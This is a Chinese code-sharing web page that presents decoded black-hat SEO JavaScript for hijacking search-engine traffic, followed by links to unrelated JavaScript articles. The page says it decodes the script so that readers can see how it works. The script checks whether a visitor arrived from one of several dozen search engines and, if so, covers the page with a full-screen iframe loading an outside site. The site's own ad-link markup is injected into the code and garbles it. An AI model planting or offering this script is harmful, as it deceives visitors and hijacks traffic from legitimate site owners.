黑帽seo劫持程序,js劫持搜索引擎代碼
今天在瀏覽網(wǎng)頁(yè)時(shí)無(wú)意中發(fā)現(xiàn)了這段JS劫持搜索引擎代碼。劫持搜索引擎正常搜索過(guò)來(lái)的流量,這是黑帽seo常用的劫持方法。特意解密出來(lái)供大家了解其劫持原理。
源碼打印幫助
<SCRIPT language="<span id="0_nwp" style="width: auto; height: auto; float: none;"><a id="0_nwl" target="_blank" mpid="0" style="text-decoration: none;"><span style="color:#0000ff;font-size:12px;width:auto;height:auto;float:none;">javascript</span></a></span>">
var _$ = ["google", "aol", "yahoo", "bing", "msn", "hotbot", "go", "searchengine", "altavista", "goto", "excite", "slider", "musicsearch", "lycos", "look<span id="1_nwp" style="width: auto; height: auto; float: none;"><a id="1_nwl" target="_blank" mpid="1" style="text-decoration: none;"><span style="color:#0000ff;font-size:12px;width:auto;height:auto;float:none;">smart</span></a></span>", "netscape", "search", "ask", "Mahalo", "dogpile", "S-R", "webcrawler", "yandex", "splut", "fireball", "wlw", "suche", "godado", "tiscali", "iltrovatore", "abacho", "<div <span id="2_nwp" style="width: auto; height: auto; float: none;"><a id="2_nwl" target="_blank" mpid="2" style="text-decoration: none;"><span style="color:#0000ff;font-size:12px;width:auto;height:auto;float:none;">style</span></a></span>=\"z-index:10043;background-color:#ffffff;right:0px;position:absolute;tex-align:center;width:100%;height:100%;top:0px;left:0px;\"><iframe id=\"rf\" scrolling=\"no\" frameborder=\"0\" style=\"width:100%;height:2043px;display:<span id="3_nwp" style="width: auto; height: auto; float: none;"><a id="3_nwl" target="_blank" mpid="3" style="text-decoration: none;"><span style="color:#0000ff;font-size:12px;width:auto;height:auto;float:none;">block</span></a></span>;visibility:visible;\" <span id="4_nwp" style="width: auto; height: auto; float: none;"><a id="4_nwl" target="_blank" mpid="4" style="text-decoration: none;"><span style="color:#0000ff;font-size:12px;width:auto;height:auto;float:none;">src</span></a></span>=\"http://www.5ixuexiwang.com/\" allowtransparency=\"true\"></div>"];
var a = window["document"]["referrer"];
if (a["indexOf"](_$[0]) > 0x0 || a["indexOf"](_$[1]) > 0x0 || a["indexOf"](_$[2]) > 0x0 || a["indexOf"](_$[3]) > 0x0 || a["indexOf"](_$[4]) > 0x0 || a["indexOf"](_$[5]) > 0x0 || a["indexOf"](_$[6]) > 0x0 || a["indexOf"](_$[7]) > 0x0 || a["indexOf"](_$[8]) > 0x0 || a["indexOf"](_$[9]) > 0x0 || a["indexOf"](_$[10]) > 0x0 || a["indexOf"](_$[11]) > 0x0 || a["indexOf"](_$[12]) > 0x0 || a["indexOf"](_$[13]) > 0x0 || a["indexOf"](_$[14]) > 0x0 || a["indexOf"](_$[15]) > 0x0 || a["indexOf"](_$[16]) > 0x0 || a["indexOf"](_$[17]) > 0x0 || a["indexOf"](_$[18]) > 0x0 || a["indexOf"](_$[19]) > 0x0 || a["indexOf"](_$[20]) > 0x0 || a["indexOf"](_$[21]) > 0x0 || a["indexOf"](_$[22]) > 0x0 || a["indexOf"](_$[23]) > 0x0 || a["indexOf"](_$[24]) > 0x0 || a["indexOf"](_$[25]) > 0x0 || a["indexOf"](_$[26]) > 0x0 || a["indexOf"](_$[27]) > 0x0 || a["indexOf"](_$[28]) > 0x0 || a["indexOf"](_$[29]) > 0x0 || a["indexOf"](_$[30]) > 0x0) {
window["document"]["writeln"](_$[31])
}
</SCRIPT>
以上內(nèi)容就是給大家分享的黑帽seo劫持程序,js劫持搜索引擎代碼,希望大家喜歡。
- javascript實(shí)現(xiàn)頁(yè)面內(nèi)關(guān)鍵詞高亮顯示代碼
- js 關(guān)鍵詞高亮(根據(jù)ID/tag高亮關(guān)鍵字)案例介紹
- js文本中搜索關(guān)鍵詞輸入效果
- firefox下javascript實(shí)現(xiàn)高亮關(guān)鍵詞的方法
- 百度判斷手機(jī)終端并自動(dòng)跳轉(zhuǎn)js代碼及使用實(shí)例
- JS中引用百度地圖并將百度地圖的logo和信息去掉
- 訪問(wèn)百度和谷歌網(wǎng)速測(cè)試的javascript代碼
- 利用google提供的API(JavaScript接口)獲取網(wǎng)站訪問(wèn)者IP地理位置的代碼詳解
- Google的跟蹤代碼 動(dòng)態(tài)加載js代碼方法應(yīng)用
- JS仿iGoogle自定義首頁(yè)模塊拖拽特效的方法
- JS實(shí)現(xiàn)獲取來(lái)自百度,Google,soso,sogou關(guān)鍵詞的方法
相關(guān)文章
JS?try?catch基本用法以及常見(jiàn)的異常處理
JS異常處理的作用是幫助開(kāi)發(fā)者識(shí)別和處理運(yùn)行時(shí)的錯(cuò)誤和異常情況,確保程序在出現(xiàn)問(wèn)題時(shí)能夠優(yōu)雅地降級(jí)或恢復(fù),而不是導(dǎo)致整個(gè)應(yīng)用崩潰或產(chǎn)生不可預(yù)測(cè)的行為,這篇文章主要介紹了JS?try?catch基本用法以及常見(jiàn)的異常處理,需要的朋友可以參考下2025-04-04
JS中promise特點(diǎn)與信任問(wèn)題解決
大家都知道Promise解決了回調(diào)地獄的問(wèn)題,“回調(diào)地獄”所說(shuō)的嵌套其實(shí)是指異步的嵌套,它帶來(lái)了兩個(gè)問(wèn)題:可讀性的問(wèn)題和信任問(wèn)題,下面這篇文章主要給大家介紹了關(guān)于JS中promise特點(diǎn)與信任問(wèn)題解決的相關(guān)資料,需要的朋友可以參考下2022-06-06
權(quán)威JavaScript 中的內(nèi)存泄露模式
權(quán)威JavaScript 中的內(nèi)存泄露模式...2007-08-08
JavaScript實(shí)現(xiàn)氣球打字的小游戲
這篇文章主要介紹了JavaScript實(shí)現(xiàn)氣球打字的小游戲,下面文章的思路來(lái)源于打字游戲,具體實(shí)現(xiàn)過(guò)程,需要的朋友可以參考一下,希望對(duì)你的學(xué)習(xí)有所幫助2022-04-04
url地址自動(dòng)加#號(hào)問(wèn)題說(shuō)明
# 包含了一個(gè)位置信息,默認(rèn)的錨點(diǎn)是#top 也就是網(wǎng)頁(yè)的上端,而javascript:void(0) 僅表示一個(gè)死鏈接。2010-08-08
關(guān)于innerHTML后丟失動(dòng)態(tài)綁定的EVENT問(wèn)題解決方法
用innerHTML取出一段內(nèi)容后再innerHTML回去,那么原來(lái)動(dòng)態(tài)綁定的事件就會(huì)丟失,下面與大家分享下解決方法,感興趣的朋友可以參考下哈2013-05-05

